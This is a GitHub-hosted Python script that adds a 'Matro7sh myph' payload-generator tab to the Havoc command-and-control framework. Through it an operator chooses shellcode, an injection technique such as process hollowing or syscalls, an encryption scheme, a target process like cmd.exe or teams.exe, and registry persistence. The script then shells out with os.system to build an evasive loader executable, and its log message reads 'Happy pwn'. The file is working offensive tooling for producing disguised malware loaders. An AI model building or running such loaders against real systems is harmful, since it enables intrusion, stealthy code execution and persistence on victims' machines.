-
Notifications
You must be signed in to change notification settings - Fork 10
/
matro7sh_myph.py
227 lines (171 loc) · 8.36 KB
/
matro7sh_myph.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
#!/usr/bin/env python
# -*- Coding: UTF-8 -*-
# Author: @jenaye_fr & @djnn1337
# Created on: Mon, 17. Nov 2023
# Description: matro7sh myph Loader support for Havoc C2 framework
# Usage: Load this script into Havoc: Scripts -> Scripts Manager -> Load to create matro7sh Tab
import os
import shutil
import havoc # type: ignore
import havocui # type: ignore
from datetime import datetime
# Configuration
MYPH_LOADER_PATH = shutil.which("myph")
MYPH_EXEC_TECHNIQUES = ["CRT", "CRTx", "CreateFiber", "ProcessHollowing", "CreateThread", "EnumCalendarInfoA", "Syscall", "Etwp"]
MYPH_ENCRYPT_TECHNIQUES = ["AES", "chacha20", "XOR", "blowfish"]
# Variables & Defaults
myph_shellcode_path = ""
myph_shellcode_encryption_key = ""
myph_shellcode_encryption_kind = "AES"
myph_target_process = "cmd.exe"
myph_shellcode_execution_technique = "CRT"
myph_output_path = "/tmp/myph.exe"
myph_persistence_reg_name = ""
# Colors
HAVOC_ERROR = "#ff5555" # Red
HAVOC_SUCCESS = "#50fa7b" # Green
HAVOC_COMMENT = "#6272a4" # Greyish blue
HAVOC_DARK = "#555766" # Dark Grey
HAVOC_INFO = "#8be9fd" # Cyan
HAVOC_WARNING = "#ffb86c" # Orange
# Labels
myph_label_to_replace = f"<b style=\"color:{HAVOC_ERROR};\">No shellcode selected.</b>"
myph_label_execution_technique = ""
if not MYPH_LOADER_PATH:
print("[-] Loader not found in $PATH")
print("Please run script located in install/ directory :)")
havocui.messagebox("Loader not found in: ", MYPH_LOADER_PATH)
# Create dialog and log widget
dialog = havocui.Dialog("Matro7sh Myph Payload Generator", True, 670, 400)
log = havocui.Logger("matro7sh myph Log")
def myph_change_shellcode_exec_method(num):
global myph_shellcode_execution_technique
if num:
myph_shellcode_execution_technique = MYPH_EXEC_TECHNIQUES[num]
else:
myph_shellcode_execution_technique = "CRT"
print("[*] Shellcode execution method changed: ", myph_shellcode_execution_technique)
global myph_label_execution_technique
warn_label = f"<b style=\"color:{HAVOC_WARNING};\">This method will not use the Process To Inject setting.</b>"
techniques_to_warn = {
"CreateThread": warn_label,
"CreateFiber": warn_label,
"CreateThread": warn_label,
"EnumCalendarInfoA": warn_label,
"Etwp": warn_label,
"Syscall": warn_label,
"ProcessHollowing": "",
"CRT": "",
"CRTx": "",
}
dialog.replaceLabel(myph_label_execution_technique, techniques_to_warn[myph_shellcode_execution_technique])
myph_label_execution_technique = techniques_to_warn[myph_shellcode_execution_technique]
def myph_change_target_process(p):
global myph_target_process
myph_target_process = p
print("[*] Target process: ", myph_target_process)
def myph_change_default_key(k):
global myph_shellcode_encryption_key
myph_shellcode_encryption_key = k
print("[*] Key changed: ", myph_shellcode_encryption_key)
def myph_change_shellcode_encrypt_method(num):
global myph_shellcode_encryption_kind
if num:
myph_shellcode_encryption_kind = MYPH_ENCRYPT_TECHNIQUES[num]
else:
myph_shellcode_encryption_kind = "AES"
print("[*] Shellcode encryption method changed: ", myph_shellcode_encryption_kind)
def myph_change_persistence_reg_setting(reg):
global myph_persistence_reg_name
if reg:
myph_persistence_reg_name = reg
else:
myph_persistence_reg_name = ""
print(f"[*] Enabled registry persistence (payload name: {reg})")
def myph_change_shellcode_path():
global myph_shellcode_path
global myph_label_to_replace
myph_shellcode_path = havocui.openfiledialog("Shellcode path").decode("ascii")
print("[*] Shellcode path changed: ", myph_shellcode_path, ".")
formatted_shellcode_path = f"<span style=\"color:{HAVOC_SUCCESS};\">{myph_shellcode_path}</span>"
dialog.replaceLabel(myph_label_to_replace, formatted_shellcode_path)
myph_label_to_replace = formatted_shellcode_path if myph_shellcode_path != " " \
else f"<b style=\"color:{HAVOC_ERROR};\">No shellcode selected.</b>"
# Generate payload
def myph_run():
def get_build_command() -> str:
global myph_shellcode_path
global myph_shellcode_encryption_key
global myph_shellcode_execution_technique
global myph_target_process
global myph_shellcode_encryption_kind
global myph_output_path
global myph_persistence_reg_name
myph_output_path = havocui.savefiledialog("Output Path").decode("ascii")
print("[*] Output Path changed: ", myph_output_path, ".")
base_cmd = f'{MYPH_LOADER_PATH}'
if myph_shellcode_path != "":
base_cmd = f'{base_cmd} --shellcode {myph_shellcode_path}'
if myph_shellcode_encryption_kind != "":
base_cmd = f'{base_cmd} --encryption {myph_shellcode_encryption_kind}'
if myph_shellcode_encryption_key != "":
base_cmd = f'{base_cmd} --key {myph_shellcode_encryption_key}'
if myph_target_process != "":
base_cmd = f'{base_cmd} --process {myph_target_process}'
if myph_shellcode_execution_technique != "":
base_cmd = f'{base_cmd} --technique {myph_shellcode_execution_technique}'
if myph_persistence_reg_name != "":
base_cmd = f'{base_cmd} --persistence {myph_persistence_reg_name}'
base_cmd = f'{base_cmd} --out {myph_output_path}'
print(f"[+] Command to be run: {base_cmd}")
return base_cmd
def execute():
if myph_shellcode_encryption_key == "":
log.addText(f"[<span style=\"color:{HAVOC_INFO};\">*</span>] No AES key provide it will be random one.")
else:
log.addText(f"[<span style=\"color:{HAVOC_INFO};\">*</span>] AES key provided = {myph_shellcode_encryption_key}.")
cmd = get_build_command()
os.system(cmd)
# Create Log
log.addText(f"Command has been be executed")
log.addText(f"Check client log to see the output")
log.addText(
f"<b style=\"color:{HAVOC_SUCCESS};\">Payload generated successfully at {myph_output_path} using myph loader. Happy pwn</b>")
log.setBottomTab()
log.setBottomTab()
log.addText(
f"<b style=\"color:{HAVOC_DARK};\">───────────────────────────────────────── running myph ─────────────────────────────────────────</b>")
log.addText(f"<b style=\"color:{HAVOC_COMMENT};\">{datetime.now().strftime('%d/%m/%Y %H:%M:%S')} </b>")
global myph_shellcode_path
if myph_shellcode_path == "":
havocui.messagebox("Error", "Please specify a valid shellcode path.")
log.addText(f"[<span style=\"color:{HAVOC_ERROR};\">-</span>] No shellcode file specified.")
return
execute()
dialog.close()
def myph_loader_generator():
def build():
dialog.clear()
# Get Listeners
global listeners
listeners = havoc.GetListeners()
# Build Dialog
dialog.addLabel(f"<b>──────────────────────────── Required Settings for Myph ─────────────────────────────</b>")
dialog.addButton("Choose shellcode", myph_change_shellcode_path)
dialog.addLabel(myph_label_to_replace)
dialog.addLabel("<b>[*] Shellcode execution method</b>")
dialog.addCombobox(myph_change_shellcode_exec_method, *MYPH_EXEC_TECHNIQUES)
dialog.addLabel(myph_label_execution_technique)
dialog.addLabel("<b>[*] Shellcode encryption method</b>")
dialog.addCombobox(myph_change_shellcode_encrypt_method, *MYPH_ENCRYPT_TECHNIQUES)
dialog.addLabel("<b>[*] Encryption key (Default: random)</b>")
dialog.addLineedit("e.g. 0123456789ABCDEF1123345611111111", myph_change_default_key)
dialog.addLabel("<b>[*] Process to inject to (Default: cmd.exe)</b>")
dialog.addLineedit("e.g. teams.exe", myph_change_target_process)
dialog.addLabel("<b>[*] Binary name for Registry Key persistence")
dialog.addLineedit("leave empty if you dont want to use persistence from Myph", myph_persistence_reg_name)
dialog.addButton("Generate", myph_run)
dialog.exec()
build()
# Create Tab
havocui.createtab("Matro7sh myph", "myph loader", myph_loader_generator)